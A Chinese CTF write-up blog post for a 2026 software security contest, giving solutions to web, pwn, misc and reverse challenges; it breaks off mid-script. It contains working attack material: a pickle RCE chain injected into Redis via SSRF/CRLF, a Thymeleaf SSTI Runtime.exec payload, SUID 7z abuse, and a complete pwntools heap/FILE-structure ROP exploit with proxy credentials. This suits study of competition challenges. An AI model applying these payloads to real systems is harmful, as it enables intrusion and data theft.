Logo
Overview

2026软件安全赛初赛东北赛区题解

March 15, 2026

两个人ak了。

不过…我讨厌国内安全比赛。

web

auth

注册一个用户之后修改头像,avatar_url 支持 file:// 协议,可以任意文件读取,但是没权限读取 /flag,结果经过 base64 后放在头像框内

先读 /app/app.py

avatar_url=file:///app/app.py

发现存在 redis,尝试读 redis 持久化文件 dump.rdb

avatar_url=file:///var/lib/redis/dump.rdb

拿到 Flask secret_key

伪造 admin 的 session cookie 登录

/admin/online-users 会遍历 online_user:* 并反序列化。

虽然用了 RestrictedUnpickler,但放行了 builtins.getattr,而 OnlineUser 在白名单内

可构造 pickle 链:

TEXT
getattr(getattr(getattr(getattr(OnlineUser, "__init__"), "__globals__"), "get")("os"), "system")(cmd)

由于目标是:online_user:<user>

需要把该键覆盖成恶意 pickle

利用点仍是 avatar_url:将请求打到 127.0.0.1:6379,通过 CRLF + RESP 进行协议注入,发送:

TEXT
AUTH redispass123
SET online_user:<user> <pickle_payload>
EXPIRE online_user:<user> 3600

通过读取 file:///proc/1/task/1/children,拿到子进程 PID:11 14 20

逐个读 file:///proc/<pid>/cmdline

在 pid=11 看到可疑启动命令:

TEXT
python3 /opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py

直接读这个脚本文件,发现里面存在:

TEXT
SimpleXMLRPCServer(("0.0.0.0", 54321), ...)

暴露方法 execute_command,同时硬编码 token 为 mcp_secure_token_b2rglxd

在容器内执行 xmlrpc.client.ServerProxy("http://127.0.0.1:54321/") 可以调用

所以反序列化命令可以直接写成:

PYTHON
python3 -c "import xmlrpc.client;print(xmlrpc.client.ServerProxy('http://127.0.0.1:54321/').execute_command('mcp_secure_token_b2rglxd','cat /flag'))" >/tmp/mcp_out.txt

最后利用前面的任意文件读取(avatar_url=file:///tmp/mcp_out.txt)从 /tmp/mcp_out.txt 中拿到 flag

thymeleaf

  1. PRNG 状态泄露

用户注册时会从后端返回一个 PRNG 取值,可以从中获得其内部状态,然后反推回 admin 账号的密码

TEXT
 # Mask for a 48-bit value, and a mask selecting its low 47 bits.
 MASK = (1 << 48) - 1
 LOW47 = (1 << 47) - 1
 
 def prev_candidates(cur):
     """Return the two 48-bit values formed by shifting the low 47 bits of
     ``cur`` left by one and setting bit 0 to 0 or 1."""
     # NOTE(review): presumably the generator loses one low bit per step, so
     # the previous state is only known up to that bit -- confirm against the
     # challenge's PRNG.
     base = ((cur & LOW47) << 1) & MASK
     return [base, base | 1]
2. Thymeleaf SSTI

控制器中存在

TEXT
 return "admin :: " + section;

当 Thymeleaf 看到 :: 时,会把它当作 fragment expression 去解析,故此处存在 SSTI 漏洞

在高版本 Thymeleaf 里,直接写 ${...} 通常会被拦,但通过预处理和字面量拼接可以绕过:

TEXT
__|$${...}|__::.x

在通过 SSTI 进行 RCE 的过程中,由于不同 JDK 版本的 Runtime.exec 的多个重载顺序可能不同,需要爆破之后找出可用的重载下标

TEXT
 # Expression text that looks up java.lang.Runtime by name and invokes its
 # 'getRuntime' method reflectively.
 rt = "''.getClass().forName('java.lang.Runtime').getMethods.?[name=='getRuntime'][0].invoke(null)"
 # Invoke the idx-th method named 'exec' on that Runtime object; idx is the
 # overload index being brute-forced (defined outside this snippet).
 expr = f"{rt}.getClass.getMethods.?[name=='exec'][{idx}].invoke({rt},'/usr/bin/id')"

RCE 之后进去的用户是 ctf,需要 root 用户才能读取 /flag

3. 7z提权

find suid:

TEXT
 find / -perm -4000 -type f

发现其中最关键的是带 SUID 位的 7z,最后使用 /usr/bin/7z a -ttar -an -so /flag 直接获得 flag 内容

pwn

MailSystem

  1. 注册13个用户可以把admin指针给覆盖掉从而可以登录
  2. 下界没有考虑导致可以从mail_user_to_user leak到libc,从而覆盖stdout。
  3. 然后栈迁移 -> rop。
PYTHON
from pwn import *
import os, shutil, tempfile
import socket


# pwntools context: 64-bit Linux target, informational logging.
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'info'


# Paths of the challenge binary, its libc and its dynamic loader.
EXE = './pwn'
LIBC = './libc.so.6'
LD = './ld-linux-x86-64.so.2'


# Load the ELF images; the binary is also registered as pwntools' context.binary.
elf = context.binary = ELF(EXE, checksec=False)
libc = ELF(LIBC, checksec=False)


# Negative value passed as the destination "user ID" to admin_forward().
# NOTE(review): presumably an out-of-bounds index that lands on the stdout
# pointer -- confirm against the binary's layout.
stdout_offset = -7


# Remote target plus the SOCKS5 proxy (and its credentials) used to reach it.
host = '192.0.100.2'
port = 9999
socks5 = '3.dart.ccsssc.com:26177'
socks_user = '3hm3n1br'
socks_pass = 'tbkzq6tp'




def _normalize_socks5(value: str) -> str:
    if not value:
        return ''
    value = str(value).strip()
    if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
        return ''
    return value




def _normalize_opt(value: str) -> str:
    if value is None:
        return ''
    value = str(value).strip()
    if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
        return ''
    return value




def _enable_socks5(proxy_spec: str, username: str = '', password: str = ''):
    """Route all new sockets through a SOCKS5 proxy given as ``host:port``.

    Does nothing when the normalized spec is empty. Otherwise installs the
    proxy as the default of the ``socks`` module and replaces
    ``socket.socket`` with ``socks.socksocket``.

    Raises:
        ValueError: if the spec is not of the form ``host:port`` with a
            numeric port.
    """
    spec = _normalize_socks5(proxy_spec)
    if not spec:
        return

    # Split on the last colon so that everything before it is the host part.
    proxy_host, colon, proxy_port = spec.rpartition(':')
    if not (colon and proxy_host and proxy_port.isdigit()):
        raise ValueError(f'Invalid SOCKS5 proxy: {spec!r}, expected host:port')

    # Imported lazily: only needed when a proxy is actually requested.
    import socks

    user = _normalize_opt(username) or None
    secret = _normalize_opt(password) or None
    socks.set_default_proxy(
        socks.SOCKS5,
        proxy_host,
        int(proxy_port),
        username=user,
        password=secret,
    )
    socket.socket = socks.socksocket

    if user or secret:
        auth_state = 'enabled'
    else:
        auth_state = 'disabled'
    info(f'Using SOCKS5 proxy: {proxy_host}:{proxy_port} (auth={auth_state})')




def _prepare_loader(path: str) -> str:
    if os.access(path, os.X_OK):
        return path
    dst = os.path.join(tempfile.gettempdir(), 'ld.mail_system')
    if not os.path.exists(dst):
        shutil.copy2(path, dst)
        os.chmod(dst, 0o755)
    return dst




def start():
    """Open the target tube and consume output up to the first menu prompt.

    With ``args.REMOTE`` set, connects to ``host:port`` through the configured
    SOCKS5 proxy; otherwise spawns the binary locally under the bundled loader
    with the current directory as library path.
    """
    if not args.REMOTE:
        loader = _prepare_loader(LD)
        argv = [loader, '--library-path', '.', EXE]
        tube = process(argv, stdin=PIPE, stdout=PIPE)
    else:
        _enable_socks5(socks5, socks_user, socks_pass)
        tube = remote(host, port)
    tube.recvuntil(b'Your choice: ')
    return tube




def register(io, name: bytes, password: bytes):
    """Pick menu entry 2 and answer the name/password prompts.

    Returns everything received up to and including the next menu prompt.
    """
    io.sendline(b'2')
    dialogue = (
        (b'Input your name: ', name),
        (b'Input your password: ', password),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    return io.recvuntil(b'Your choice: ')




def login_user(io, name: bytes, password: bytes):
    """Pick menu entry 1 and answer the name/password prompts.

    Returns everything received up to and including the next menu prompt.
    """
    io.sendline(b'1')
    dialogue = (
        (b'Input your name: ', name),
        (b'Input your password: ', password),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)
    return io.recvuntil(b'Your choice: ')




def login_admin(io):
    """Pick menu entry 1 and answer both prompts with a NUL byte plus newline.

    Returns everything received up to and including the next menu prompt.
    """
    # NOTE(review): presumably an empty name/password matches the admin record
    # after it has been overwritten -- confirm against the binary.
    empty_answer = b'\x00\n'
    io.sendline(b'1')
    for prompt in (b'Input your name: ', b'Input your password: '):
        io.recvuntil(prompt)
        io.send(empty_answer)
    return io.recvuntil(b'Your choice: ')




def write_mail(io, data: bytes):
    """Pick menu entry 1 and write ``data`` (1 to 0x100 bytes) as the mail body.

    The body is sent raw, without a trailing newline. Returns everything
    received up to and including the next menu prompt.
    """
    size = len(data)
    assert 1 <= size <= 0x100
    io.sendline(b'1')
    io.recvuntil(b'How many bytes do you want to write? (1-256): ')
    io.sendline(b'%d' % size)
    io.recvuntil(b'bytes):\n')
    io.send(data)
    return io.recvuntil(b'Your choice: ')




def send_mail(io, dst: int, overwrite: bool = True):
    """Pick menu entry 3 and send the current mail to user ``dst``.

    If the service asks whether to overwrite, answers 'y' or 'n' according to
    ``overwrite``. Returns all output received up to the next menu prompt.
    """
    confirm_prompt = b'Overwrite? (y/n): '
    menu_prompt = b'Your choice: '

    io.sendline(b'3')
    io.recvuntil(b'Who do you want to send the mail to? (input user ID 1-12)\n')
    io.sendline(str(dst).encode())

    seen = io.recvuntil([confirm_prompt, menu_prompt])
    if not seen.endswith(confirm_prompt):
        return seen

    if overwrite:
        io.sendline(b'y')
    else:
        io.sendline(b'n')
    return seen + io.recvuntil(menu_prompt)




def logout_user(io):
    """Send menu entry 4 and return the output up to the next menu prompt."""
    menu_entry = b'4'
    io.sendline(menu_entry)
    reply = io.recvuntil(b'Your choice: ')
    return reply




def admin_logout(io):
    """Send menu entry 5 and return the output up to the next menu prompt."""
    menu_entry = b'5'
    io.sendline(menu_entry)
    reply = io.recvuntil(b'Your choice: ')
    return reply




def admin_forward(io, src: int, dst: int, which: int, overwrite: bool = True, final_mode: str = 'prompt'):
    """Pick menu entry 4 and forward mail number ``which`` from ``src`` to ``dst``.

    Answers an optional overwrite question with 'y' or 'n' per ``overwrite``.
    If the service never asks which mail to forward, returns the output
    collected so far. Otherwise sends ``which`` and, depending on
    ``final_mode``, either waits for the next menu prompt ('prompt') or
    gathers whatever arrives within 0.5 s (any other value).
    """
    confirm_prompt = b'Overwrite? (y/n): '
    which_prompt = b'Which mail would you like to forward?\n'
    menu_prompt = b'Your choice: '

    io.sendline(b'4')
    id_dialogue = (
        (b'Enter source user ID (whose mail to forward): (1-12) ', src),
        (b'Enter destination user ID (1-12): ', dst),
    )
    for prompt, user_id in id_dialogue:
        io.recvuntil(prompt)
        io.sendline(str(user_id).encode())

    seen = io.recvuntil([confirm_prompt, which_prompt, menu_prompt])
    if seen.endswith(confirm_prompt):
        io.sendline(b'y' if overwrite else b'n')
        seen += io.recvuntil([which_prompt, menu_prompt])

    if b'Which mail would you like to forward?' in seen:
        # The selection prompt itself is consumed but not kept in the result.
        io.recvuntil(menu_prompt)
        io.sendline(str(which).encode())
        if final_mode == 'prompt':
            tail = io.recvuntil(menu_prompt)
        else:
            tail = io.recvrepeat(0.5)
        seen += tail
    return seen




def ban_user(io, name: bytes, password: bytes, victim_id: int = 8):
    """Log in as ``name`` and keep mailing ``victim_id`` until the account is banned.

    Sends batches of six write-then-send sequences and checks the output for
    'Account has been banned!'. Returns the output of the batch in which the
    ban message appeared.

    Raises:
        RuntimeError: if the login does not report 'Welcome back', or if a
            batch's output contains 'Welcome back' without the user menu.
    """
    out = login_user(io, name, password)
    if b'Welcome back' not in out:
        raise RuntimeError(f'login failed for {name!r}: {out!r}')


    # One pre-built request, sent without waiting for prompts:
    #   "1\n"  -> menu: write mail
    #   "1\n"  -> length: 1 byte
    #   "A"    -> the 1-byte body (no newline)
    #   "3\n"  -> menu: send mail
    #   id     -> destination user (victim_id)
    #   "y\n"  -> answer to the overwrite question
    one = b'1\n1\nA3\n' + str(victim_id).encode() + b'\ny\n'


    total = 0
    # Loops until the ban message shows up; there is no upper bound on attempts.
    while True:
        io.send(one * 6)
        total += 6


        # Wait up to 5 s for a menu prompt, then drain whatever else arrives.
        out = io.recvuntil(b'Your choice: ', timeout=5)
        out += io.recvrepeat(0.2)


        if b'Account has been banned!' in out:
            success(f'{name!r} banned after {total} sends')
            return out


        # 'Welcome back' without the user menu means the session is not where
        # the batch expected it to be.
        if b'Welcome back' in out and b'1. Write mail' not in out:
            raise RuntimeError(f'{name!r} state changed unexpectedly: {out!r}')


        info(f'{name!r} not banned yet, sent={total}')


def takeover_admin(io):
    """Register u1..u13 (banning u1..u5 part-way through) and log in as admin.

    Users u1..u8 are registered first, u1..u5 are then banned, and finally
    u9..u13 are registered. Asserts that the admin login afterwards reports
    'Welcome admin!'.
    """
    def creds(n):
        # Account n uses name "u<n>" and password "p<n>".
        return f'u{n}'.encode(), f'p{n}'.encode()

    for n in range(1, 9):
        register(io, *creds(n))
    for n in range(1, 6):
        ban_user(io, *creds(n))
    for n in range(9, 14):
        register(io, *creds(n))

    banner = login_admin(io)
    assert b'Welcome admin!' in banner




def leak_libc(io, src_uid: int = 8):
    """Leak a libc address by forwarding a crafted mail to ``stdout_offset``.

    Writes a 34-byte payload as user ``u<src_uid>``, forwards it as admin to
    the destination ``stdout_offset``, and parses the bytes printed between
    the 'Which mail would you like to forward?' line and 'Mail forwarded'.

    Returns:
        (libc_base, stdout): the computed libc base and the leaked address
        treated as ``_IO_2_1_stdout_``.
    """
    # Four qwords (0xfbad1800, 0, 0, 0) followed by the two bytes 0xb780.
    # NOTE(review): presumably a partial overwrite of the stdout FILE struct
    # (flags, zeroed read pointers, low 16 bits of the write base) -- confirm.
    payload = flat(0xfbad1800, 0, 0, 0) + p16(0xb780)


    # Store the payload as the source user's mail, then switch back to admin.
    admin_logout(io)
    login_user(io, f'u{src_uid}'.encode(), f'p{src_uid}'.encode())
    write_mail(io, payload)
    logout_user(io)
    login_admin(io)


    # 'repeat' mode: collect timed output instead of waiting for a menu prompt.
    data = admin_forward(io, src_uid, stdout_offset, 1, final_mode='repeat')
    marker = b'Which mail would you like to forward?\n'
    leak = data.split(marker, 1)[1].split(b'Mail forwarded', 1)[0]


    # The qword at offset 0x20 of the leaked bytes is taken as stdout's address.
    stdout = u64(leak[0x20:0x28])
    libc_base = stdout - libc.sym['_IO_2_1_stdout_']


    success(f'libc_base = {hex(libc_base)}')
    success(f'stdout    = {hex(stdout)}')
    return libc_base, stdout




def build_stdout_payload(libc_base: int, stdout: int):
    """Build the 0x100-byte image that is written over the stdout FILE structure.

    A template of stdout's fields is filled in first and then patched so that
    the wide-character path calls ``setcontext+0x3d`` with register values
    taken from the same buffer (see the "exploit patch" comments below).

    Args:
        libc_base: runtime base address of libc.
        stdout: runtime address of ``_IO_2_1_stdout_``.

    Returns:
        (payload, stage2_addr): the 0x100-byte payload and the address the
        second stage is to be read into.
    """
    stderr = libc_base + libc.sym['_IO_2_1_stderr_']
    stdin = libc_base + libc.sym['_IO_2_1_stdin_']


    # Hard-coded libc offset chosen as the stage-2 buffer / new stack.
    stage2_addr = libc_base + 0x21d000
    wide_data = stdout - 0x50


    # The raw offsets below are hard-coded for the libc build shipped with the
    # challenge (named after the variables they are assigned to).
    setcontext_3d = libc_base + libc.sym['setcontext'] + 0x3d
    read_addr = libc_base + libc.sym['read']
    file_jumps = libc_base + 0x217600
    wfile_jumps = libc_base + 0x2170c0
    lock_ptr = libc_base + 0x21ca70


    d = bytearray(0x100)


    def wq(off: int, val: int):
        # Store a 64-bit little-endian value at byte offset ``off``.
        d[off:off + 8] = p64(val)


    def wd(off: int, val: int):
        # Store the low 32 bits of ``val`` at byte offset ``off``.
        d[off:off + 4] = p32(val & 0xffffffff)


    # known-good stdout template for this libc
    wq(0x00, 0xfbad2887)
    for off in [0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
        wq(off, stdout + 0x83)
    wq(0x40, stdout + 0x84)
    wq(0x48, 0)
    wq(0x50, 0)
    wq(0x58, 0)
    wq(0x60, 0)
    wq(0x68, stdin)
    wq(0x70, 1)
    wq(0x78, 0xffffffffffffffff)
    wq(0x80, 0x0a000000)
    wq(0x88, lock_ptr)
    wq(0x90, 0xffffffffffffffff)
    wq(0x98, 0)
    wq(0xa0, libc_base + 0x21a9a0)
    wq(0xa8, 0)
    wq(0xb0, 0)
    wq(0xb8, 0)
    wd(0xc0, 0xffffffff)
    wq(0xc8, 0)
    wq(0xd0, 0)
    wq(0xd8, file_jumps)
    wq(0xe0, stderr)
    wq(0xe8, stdout)
    wq(0xf0, stdin)
    wq(0xf8, 0)


    # exploit patch:
    #   _IO_wfile_overflow -> _IO_wdoallocbuf -> call [wide_vtable+0x68]
    # with wide_data = stdout-0x50 and wide_vtable = stdout.
    # These writes deliberately override some of the template fields above.
    wq(0x00, 0xfbad2085)      # clear _IO_NO_WRITES and clear the 0x800 bit
    wq(0x18, 0)               # wide+0x68 -> rdi = 0
    wq(0x20, stage2_addr)     # wide+0x70 -> rsi = stage2 buffer
    wq(0x38, 0x400)           # wide+0x88 -> rdx = count
    wq(0x48, 0)               # wide+0x98 -> rcx
    wq(0x50, stage2_addr)     # wide+0xa0 -> rsp = stage2 buffer
    wq(0x58, read_addr)       # wide+0xa8 -> return to read
    wq(0x68, setcontext_3d)   # stdout[0x68] == fake_wide_vtable[0x68]
    wq(0x90, stdout)          # wide+0xe0 -> fake wide_vtable = stdout
    wq(0xa0, wide_data)       # _wide_data = stdout-0x50
    wd(0xc0, 1)               # _mode > 0
    wq(0xd8, wfile_jumps)     # use _IO_wfile_jumps


    return bytes(d), stage2_addr




# Stage 1: obtain an admin session.
io = start()
takeover_admin(io)
success("stage1 done: fake admin acquired")


# Stage 2: leak libc and build the fake stdout structure.
libc_base, stdout = leak_libc(io)
stdout_payload, stage2_addr = build_stdout_payload(libc_base, stdout)


# Gadget addresses are found in the libc image and rebased manually.
rop = ROP(libc)


pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address + libc_base
pop_rsi = rop.find_gadget(["pop rsi", "ret"]).address + libc_base
# First gadget whose instructions are exactly "pop rdx; pop r12; ret".
pop_rdx_r12 = (
    next(
        addr
        for addr, g in rop.gadgets.items()
        if g.insns == ["pop rdx", "pop r12", "ret"]
    )
    + libc_base
)


open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]


# Layout inside the stage-2 buffer: ROP chain at +0, path string at +0x180,
# scratch buffer for the file contents at +0x200.
flag_addr = stage2_addr + 0x180
buf_addr = stage2_addr + 0x200


# ROP chain: open(flag_addr, 0, 0); read(3, buf_addr, 0x100);
# write(1, buf_addr, 0x100). The extra 0 after each rdx value fills r12.
# NOTE(review): assumes the opened file gets descriptor 3 -- confirm.
stage2 = flat(
    pop_rdi,
    flag_addr,
    pop_rsi,
    0,
    pop_rdx_r12,
    0,
    0,
    open_addr,
    pop_rdi,
    3,
    pop_rsi,
    buf_addr,
    pop_rdx_r12,
    0x100,
    0,
    read_addr,
    pop_rdi,
    1,
    pop_rsi,
    buf_addr,
    pop_rdx_r12,
    0x100,
    0,
    write_addr,
)


# Place "/flag" at +0x180 and pad to the 0x400 bytes requested by the payload.
stage2 = stage2.ljust(0x180, b"\x00") + b"/flag\x00"
stage2 = stage2.ljust(0x400, b"\x00")


# Store the fake stdout image as u10's mail, then forward it as admin to the
# stdout_offset destination.
admin_logout(io)
login_user(io, b"u10", b"p10")
write_mail(io, stdout_payload)
logout_user(io)
login_admin(io)


admin_forward(io, 10, stdout_offset, 1, final_mode="repeat")


# Send menu choice 5, wait briefly, then deliver the second stage.
# NOTE(review): presumably the next output through the patched stdout starts
# the chain that reads stage2 from stdin -- confirm.
io.send(b"5\n")
sleep(0.1)
io.send(stage2)


data = io.recvrepeat(2.0)
print(data)
io.interactive()

misc

steg

xxd看一眼

直接删掉前面的东西,libmagic能正常识别了。

但是打不开,图片IDAT CRC爆炸了。把idat拼起来之后错位。

写一个策略尽可能多恢复点东西:

PYTHON
import zlib
from pathlib import Path
from typing import Iterable


from PIL import Image


PNG_SIG = b'\x89PNG\r\n\x1a\n'


def iter_png_chunks(png: bytes):
    """Yield ``(type, data, start, end)`` for each chunk of a PNG byte stream.

    ``start`` is the offset of the chunk's length field and ``end`` the offset
    just past its CRC. CRCs are not verified. Iteration stops after IEND, or
    as soon as a chunk would run past the end of the buffer.

    Raises:
        ValueError: if the stream does not begin with the PNG signature.
    """
    if not png.startswith(PNG_SIG):
        raise ValueError('Not a PNG stream')

    total = len(png)
    cursor = len(PNG_SIG)
    # A chunk needs at least 12 bytes: length (4) + type (4) + CRC (4).
    while cursor + 12 <= total:
        payload_len = int.from_bytes(png[cursor:cursor + 4], 'big')
        chunk_type = png[cursor + 4:cursor + 8]
        payload_at = cursor + 8
        chunk_end = payload_at + payload_len + 4
        if chunk_end > total:
            return
        yield chunk_type, png[payload_at:chunk_end - 4], cursor, chunk_end
        if chunk_type == b'IEND':
            return
        cursor = chunk_end




def get_png_info(png: bytes):
    """Parse the first IHDR chunk of ``png`` into a dict.

    Returns the keys width, height, bit_depth, color_type, compression,
    filter_method, interlace and channels (samples per pixel for the colour
    type, 0 if the colour type is unknown).

    Raises:
        ValueError: if IHDR is missing or its data is not 13 bytes long.
    """
    byte_fields = ('bit_depth', 'color_type', 'compression', 'filter_method', 'interlace')
    channels_by_color_type = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}

    for chunk_type, payload, _begin, _finish in iter_png_chunks(png):
        if chunk_type != b'IHDR':
            continue
        if len(payload) != 13:
            raise ValueError('Bad IHDR length')

        header = {
            'width': int.from_bytes(payload[0:4], 'big'),
            'height': int.from_bytes(payload[4:8], 'big'),
        }
        # Bytes 8..12 are five single-byte fields in this order.
        header.update(zip(byte_fields, payload[8:13]))
        header['channels'] = channels_by_color_type.get(header['color_type'], 0)
        return header

    raise ValueError('IHDR not found')




def paeth_predictor(a: int, b: int, c: int):
    """Return whichever of ``a``, ``b``, ``c`` is closest to ``a + b - c``.

    Ties are resolved in the order a, b, c.
    """
    estimate = a + b - c
    # min() returns the first minimal item, which gives the a, b, c tie order.
    return min((a, b, c), key=lambda candidate: abs(estimate - candidate))




def reconstruct_scanline(filter_type: int, filtered: bytes, prior: bytes, channels: int = 3):
    """Undo one PNG row filter and return the reconstructed row bytes.

    Args:
        filter_type: 0 None, 1 Sub, 2 Up, 3 Average, 4 Paeth.
        filtered: the filtered row, without its leading filter-type byte.
        prior: the reconstructed previous row (read by types 2, 3 and 4).
        channels: distance in bytes to the "left" neighbour.

    Raises:
        ValueError: for any other filter type.
    """
    row_len = len(filtered)
    if filter_type not in (0, 1, 2, 3, 4):
        raise ValueError(f'Invalid filter type: {filter_type}')

    out = bytearray(row_len)
    for pos, value in enumerate(filtered):
        # Already reconstructed neighbour to the left (0 near the row start).
        left = out[pos - channels] if pos >= channels else 0

        if filter_type == 0:
            predicted = 0
        elif filter_type == 1:
            predicted = left
        elif filter_type == 2:
            predicted = prior[pos]
        elif filter_type == 3:
            predicted = (left + prior[pos]) // 2
        else:
            up = prior[pos]
            up_left = prior[pos - channels] if pos >= channels else 0
            predicted = paeth_predictor(left, up, up_left)

        out[pos] = (value + predicted) & 0xff
    return bytes(out)




# Main program
# Repair script: realign the scanlines of a damaged PNG and save the result.
input_file = Path('carved.png')
output_file = Path('carved_repaired.png')


# Read PNG
png_data = input_file.read_bytes()


# Parse PNG info
info = get_png_info(png_data)
width = info['width']
height = info['height']
num_channels = info['channels']


# Extract and concatenate all IDAT chunks.
# The file is searched for the literal bytes b'IDAT' instead of being walked
# chunk by chunk; the 4 bytes before each hit are read as the chunk length.
idat_data = bytearray()
idx = 0
while True:
    i = png_data.find(b'IDAT', idx)
    if i < 0:
        break
    if i >= 4:
        length = int.from_bytes(png_data[i - 4:i], 'big')
        data_start = i + 4
        data_end = data_start + length
        # Hits whose declared length runs past the end of the file are skipped.
        if data_end <= len(png_data):
            idat_data.extend(png_data[data_start:data_end])
    idx = i + 1


idat_data = bytes(idat_data)


# decompressobj() returns whatever could be inflated from the stream.
raw = zlib.decompressobj().decompress(idat_data)
# One filter-type byte plus num_channels bytes per pixel for every row.
row_len = 1 + num_channels * width
expected = row_len * height
# Number of bytes by which the decompressed stream exceeds the expected size.
max_delta = len(raw) - expected


# Dynamic programme over (row, cumulative shift d): the score counts how many
# rows start at a byte <= 4, i.e. at a valid filter-type value.
neg = -10 ** 9
prev = [neg] * (max_delta + 1)
prev[0] = 1 if raw[0] <= 4 else 0
parents = []


for r in range(1, height):
    cur = [neg] * (max_delta + 1)
    par = [-1] * (max_delta + 1)


    for d in range(max_delta + 1):
        best = neg
        best_pd = -1
        # The shift may stay the same or grow by at most 12 bytes per row.
        lo = max(0, d - 12)
        for pd in range(lo, d + 1):
            if prev[pd] > best:
                best = prev[pd]
                best_pd = pd


        if best_pd >= 0:
            # Position of this row's filter byte under shift d.
            idx_offset = d + r * row_len
            if idx_offset < len(raw):
                cur[d] = best + (1 if raw[idx_offset] <= 4 else 0)
                par[d] = best_pd


    parents.append(par)
    prev = cur


def endpoint_score(d):
    # Final-row score minus 0.2 per byte that the shift falls short of max_delta.
    base_score = prev[d]
    penalty = abs(d - max_delta) * 0.2
    return base_score - penalty


end_delta = max(range(max_delta + 1), key=endpoint_score)


# Walk the parent pointers back from the last row to recover each row's shift.
path = [end_delta]
for r in range(height - 1, 0, -1):
    end_delta = parents[r - 1][end_delta]
    path.append(end_delta)
path.reverse()
stride = num_channels * width


rows = []
prior = bytearray(stride)


# Unfilter every row at its chosen offset.
for r, d in enumerate(path):
    start = d + r * row_len
    filter_type = raw[start]
    filtered = raw[start + 1:start + 1 + stride]


    try:
        recon = reconstruct_scanline(filter_type, filtered, prior, num_channels)
        rows.append(recon)
        prior = recon
    except ValueError:
        # Invalid filter byte: emit an all-zero row and reset the prior row.
        recon = bytes(stride)
        rows.append(recon)
        prior = bytearray(stride)


img_data = b''.join(rows)
# The image mode is fixed to 'RGB' regardless of num_channels.
img = Image.frombytes('RGB', (width, height), img_data)


img.save(output_file)

拿出来是这样一张。

低位lsb,RGB拼接。能看到zip包。

这里小文件可以用crc32爆破了。

于是恢复出来

TEXT
pass
 is
c1!x
xtLf
%fXY
PkaA

解压flag.txt,0宽字符。。。。01编码,复原。

PYTHON
    zw = ''.join(ch for ch in text if ch in '\u200b\u200c')
    if not zw:
        raise ValueError('no zero-width data found')
    bits = ''.join('0' if ch == '\u200b' else '1' for ch in zw)
    usable = len(bits) // 8 * 8
    raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    try:
        return raw.decode('utf-8')
    except UnicodeDecodeError:
        return raw.decode('latin1')

reverse

re1

这里拼了个pyc,拿下来pylingual还原。

PYTHON
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'Payload_To_PixelCode_video.py'
# Bytecode version: 3.7.0 (3394)
# Source timestamp: 2026-01-04 04:02:18 UTC (1767499338)


from PIL import Image
import math
import os
import sys
import numpy as np
import imageio
from tqdm import tqdm
def file_to_video(input_file, width=640, height=480, pixel_size=8, fps=10, output_file='video.mp4'):
    """Encode a file as a video of black and white squares.

    Every byte of ``input_file`` is XORed with 0b10101010 and written as eight
    bits, most significant first. Each frame holds
    ``(width // pixel_size) * (height // pixel_size)`` bits in row-major
    order; a '1' bit is a black ``pixel_size`` square and a '0' bit a white
    one. The last frame is padded with '0' bits. Frames are written to
    ``output_file`` with the libx264 codec.

    Returns None, also when ``input_file`` is not a regular file.
    """
    if not os.path.isfile(input_file):
        return None
    file_size = os.path.getsize(input_file)
    binary_string = ''
    # Read the file in 1 KiB chunks and expand every byte to 8 bit characters.
    with open(input_file, 'rb') as f:
        for chunk in tqdm(iterable=iter(lambda: f.read(1024), b''), total=math.ceil(file_size / 1024), unit='KB', desc='读取文件'):
            binary_string += ''.join((f'{byte:08b}' for byte in chunk))
    xor_key = '10101010'
    xor_binary_string = ''
    # XOR each 8-bit group with the key; a shorter trailing group is copied as is.
    for i in range(0, len(binary_string), 8):
        chunk = binary_string[i:i + 8]
        if len(chunk) == 8:
            chunk_int = int(chunk, 2)
            key_int = int(xor_key, 2)
            xor_result = chunk_int ^ key_int
            xor_binary_string += f'{xor_result:08b}'
        else:
            xor_binary_string += chunk
    binary_string = xor_binary_string
    pixels_per_image = width // pixel_size * (height // pixel_size)
    num_images = math.ceil(len(binary_string) / pixels_per_image)
    frames = []
    for i in tqdm(range(num_images), desc='生成视频帧'):
        start = i * pixels_per_image
        bits = binary_string[start:start + pixels_per_image]
        # Pad the final frame with '0' bits.
        if len(bits) < pixels_per_image:
            bits = bits + '0' * (pixels_per_image - len(bits))
        img = Image.new('RGB', (width, height), color='white')
        for r in range(height // pixel_size):
            row_start = r * (width // pixel_size)
            row_end = (r + 1) * (width // pixel_size)
            row = bits[row_start:row_end]
            for c, bit in enumerate(row):
                # '1' -> black square, anything else -> white square.
                color = (0, 0, 0) if bit == '1' else (255, 255, 255)
                x1, y1 = (c * pixel_size, r * pixel_size)
                img.paste(color, (x1, y1, x1 + pixel_size, y1 + pixel_size))
        frames.append(np.array(img))
    with imageio.get_writer(output_file, fps=fps, codec='libx264') as writer:
        for frame in tqdm(frames, desc='写入视频帧'):
            writer.append_data(frame)
# Script entry point: encode the file named 'payload' with the default
# settings, or exit with status 1 if it does not exist.
if __name__ == '__main__':
    input_path = 'payload'
    if os.path.exists(input_path):
        file_to_video(input_path)
    else:
        sys.exit(1)

简单还原下。

PYTHON
from PIL import Image
import cv2
import math
import numpy as np
from tqdm import tqdm




# Decoder for the video produced by file_to_video(): sample the centre of
# every pixel_size x pixel_size cell, turn dark cells into '1' bits and light
# cells into '0' bits, XOR every byte with the key and write the result to "1".
cap = cv2.VideoCapture("video.mp4")


# Must match the encoder's parameters.
width = 640
height = 480
pixel_size = 8
fps = 10


# Collect bits in a list and join once, instead of growing a string one
# character at a time.
bit_chunks = []
half_cell = pixel_size // 2

total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
for _ in tqdm(range(total_frames)):
    ret, frame = cap.read()
    if not ret:
        break
    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    for r in range(height // pixel_size):
        y = r * pixel_size + half_cell
        for c in range(width // pixel_size):
            x = c * pixel_size + half_cell
